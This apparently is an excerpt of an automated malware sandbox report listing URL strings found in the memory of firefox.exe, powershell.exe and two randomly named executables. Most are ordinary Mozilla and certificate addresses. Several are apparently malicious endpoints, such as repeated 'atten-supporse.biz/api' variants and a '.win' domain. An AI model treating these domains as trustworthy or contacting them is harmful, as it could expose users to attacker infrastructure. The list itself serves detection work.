Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/outcomes
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/proposedDuration
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/proposedDurationawesome-bar-result-menu-rollout-phase-1
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/proposedDurationawesome-bar-result-menu-rollout-phase-1http://mozill
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabledhttp://mozilla.org/#/properties/quick
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndexhttp://mozilla.org/#/properties/quickSu
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariationresource://gre/modules/componen
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestartshttp://mozilla.org/#/p
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/referenceBranchbrowser.newtabpage.activity-stream.asrouter.userprefs
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/startDate
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/startDateTesting
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/targeting
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/targetinghttp://mozilla.org/#/properties/branches/anyOf/2/itemshttp:
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/targetinghttp://mozilla.org/#/properties/endDatehttp://mozilla.org/#
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
Source: firefox.exe, 00000022.00000002.2895818368.0000019CFDB8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2848032776.0000019CFFE4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2928377174.0000019D059AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2852709897.0000019CFFC40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2906486113.0000019CFEAD7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2805137553.0000019D012BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2725362227.0000019CFCF9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2715082064.0000019CFCFD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2915442996.0000019CFF7EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2803693593.0000019D05885000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2715527746.0000019CFD289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2932000477.0000019F0003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2891150396.0000019CFD42F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2889159936.0000019CFD105000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2808062718.0000019CFF7EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2928223842.0000019D058E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2845012882.0000019D0080B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2728917573.0000019CFCFD6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2805137553.0000019D012C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2887311061.0000019CFCFA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2887311061.0000019CFCFD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: powershell.exe, 0000000E.00000002.2606762712.0000028D1B44E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2582645797.0000028D0CD10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2606762712.0000028D1B30C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 0000000E.00000002.2582645797.0000028D0CBC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: firefox.exe, 00000022.00000002.2922378340.0000019D00CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000022.00000002.2922378340.0000019D00CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8BDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 0000000E.00000002.2582645797.0000028D0B2A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.2582645797.0000028D0C911000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://woo097878781.win
Source: powershell.exe, 0000000E.00000002.2582645797.0000028D0CA2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.2582645797.0000028D0CBC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-updateSERVICE_STILL_APPLYING_ON_SUCCESSSERVICE_STILL_APPLYING_NO_EXI
Source: firefox.exe, 00000022.00000003.2840907968.0000019D00AB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000022.00000003.2805137553.0000019D0128F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2853201201.0000019CFF7B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2805137553.0000019D012C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2913522204.0000019CFF59B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2850989468.0000019CFFC79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF96B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2915112288.0000019CFF78A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2923998213.0000019D0128F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2808062718.0000019CFF7BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2912898850.0000019CFF403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF963C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/TelemetryTimesta
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/components-utils
Source: 2bd330404c.exe, 00000011.00000002.2970389017.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2965790878.00000000059C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2913522204.0000019CFF5CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2922378340.0000019D00CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: c92938c010.exe, 00000010.00000003.2604610604.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2913522204.0000019CFF5CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2922378340.0000019D00CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893030248.0000019CFD830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000022.00000003.2706915349.0000019CFCF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707461103.0000019CFD13E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707211364.0000019CFD120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707697289.0000019CFD15D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2708005438.0000019CFD17B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecop
Source: 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecopnacl
Source: c92938c010.exe, 00000010.00000003.2553366123.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2553274997.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.caPREF_UPDATE_REQUIREBUILTINCERTSWEBEXT_BACKGROUND_PAGE_LOAD_MSnormandy-pr
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2881255814.0000019CFB200000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000022.00000002.2914823724.0000019CFF736000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2913522204.0000019CFF59B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2808062718.0000019CFF737000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2841863028.0000019D0083E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFAB61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE50C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2910613755.0000019CFF0F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD955000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: powershell.exe, 0000000E.00000002.2582645797.0000028D0B2A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: c92938c010.exe, 00000010.00000003.2628559063.0000000005D0B000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2579955491.0000000005D0F000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2603779903.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2604776557.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000013.00000002.2698914818.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/
Source: c92938c010.exe, 00000010.00000003.2628966405.00000000015EC000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2628664793.00000000015EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/%%8
Source: c92938c010.exe, 00000010.00000003.2605657588.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2579878550.0000000005D06000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2604238842.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2580771888.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2579955491.0000000005D0F000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2603779903.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2604776557.0000000005D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/&8
Source: c92938c010.exe, 00000010.00000003.2628506892.0000000005D0A000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2628559063.0000000005D0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/F8l
Source: c92938c010.exe, 00000010.00000002.2948754234.00000000015F6000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2633332327.00000000015ED000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2552871514.00000000015DF000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2628966405.00000000015EC000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2633677195.00000000015FA000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2673612146.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2633603024.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2628664793.00000000015EB000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2603875711.00000000015EB000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000013.00000002.2698914818.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000013.00000002.2700487170.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000013.00000003.2696370144.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000013.00000003.2696573532.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000013.00000002.2700487170.0000000000B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api
Source: c92938c010.exe, 00000013.00000003.2696573532.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000013.00000002.2700487170.0000000000B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiWd
Source: c92938c010.exe, 00000010.00000003.2660676123.00000000015F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiZwQdx
Source: c92938c010.exe, 00000010.00000003.2760162364.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2673612146.00000000015F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apid
Source: c92938c010.exe, 00000010.00000003.2673612146.00000000015F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apimD3
Source: c92938c010.exe, 00000010.00000003.2633332327.00000000015ED000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2628966405.00000000015EC000.00000004.00000020.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2628664793.00000000015EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apix
Source: c92938c010.exe, 00000010.00000003.2605657588.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2579878550.0000000005D06000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2604238842.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2580771888.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2579955491.0000000005D0F000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2603779903.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2604776557.0000000005D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/f8
Source: c92938c010.exe, 00000010.00000003.2580036442.0000000005D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/ii
Source: c92938c010.exe, 00000010.00000003.2603875711.00000000015EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/mD3
Source: c92938c010.exe, 00000010.00000003.2552871514.00000000015DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/s
Source: c92938c010.exe, 00000013.00000002.2698914818.0000000000B04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/api
Source: firefox.exe, 00000022.00000002.2928223842.0000019D058E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2930962305.0000019D06F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: c92938c010.exe, 00000010.00000003.2606708211.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: c92938c010.exe, 00000010.00000003.2606708211.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 00000022.00000002.2893030248.0000019CFD8A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2897927668.0000019CFDD2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA22D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDE96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
